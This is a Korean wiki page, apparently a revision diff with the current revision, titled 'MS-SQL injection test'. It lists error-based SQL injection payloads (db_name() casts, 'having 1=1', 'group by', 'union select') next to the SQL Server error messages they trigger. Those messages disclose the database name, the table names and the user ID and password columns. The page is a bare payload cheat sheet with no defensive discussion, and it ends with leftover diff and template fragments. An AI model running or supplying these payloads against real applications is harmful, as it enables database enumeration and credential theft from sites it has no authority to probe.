"MS-SQL 인젝션 테스트"의 두 판 사이의 차이

34번째 줄: 34번째 줄:


* DB명 확인
* DB명 확인
<source lang='text'>
</source>
<source lang='text'>
<source lang='text'>
' union select '1','2','3','4
' union select '1','2','3','4

2015년 1월 20일 (화) 11:04 판

1 개요

MS-SQL 인젝션 테스트
  • DB명 확인
' and db_name()=1 --
-- com.microsoft.sqlserver.jdbc.SQLServerException: nvarchar 값 'jmdb'을(를) 데이터 형식 int(으)로 변환하지 못했습니다.
  • 테이블명 확인
' having 1=1 --
com.microsoft.sqlserver.jdbc.SQLServerException: 열 'member.IDX'이(가) 집계 함수나 GROUP BY 절에 없으므로 SELECT 목록에서 사용할 수 없습니다.
  • 컬럼명 확인
' group by board_member.IDX having 1=1 --
com.microsoft.sqlserver.jdbc.SQLServerException: 열 'board_member.USERID'이(가) 집계 함수나 GROUP BY 절에 없으므로 SELECT 목록에서 사용할 수 없습니다.
' group by board_member.IDX, board_member.USERID having 1=1 --
com.microsoft.sqlserver.jdbc.SQLServerException: 열 'board_member.USERPW'이(가) 집계 함수나 GROUP BY 절에 없으므로 SELECT 목록에서 사용할 수 없습니다.

...

  • DB명 확인
' union select '1','2','3','4
com.microsoft.sqlserver.jdbc.SQLServerException: UNION, INTERSECT 또는 EXCEPT 연산자를 사용하여 결합된 모든 쿼리의 대상 목록에는 동일한 개수의 식이 있어야 합니다.
  • 기타
' union select '1','2','3','4','5
com.microsoft.sqlserver.jdbc.SQLServerException: 문자열을 datetime으로 변환하지 못했습니다.
' union select '1','2','3','4',5--

2 같이 보기

문서 댓글 ({{ doc_comments.length }})
{{ comment.name }} {{ comment.created | snstime }}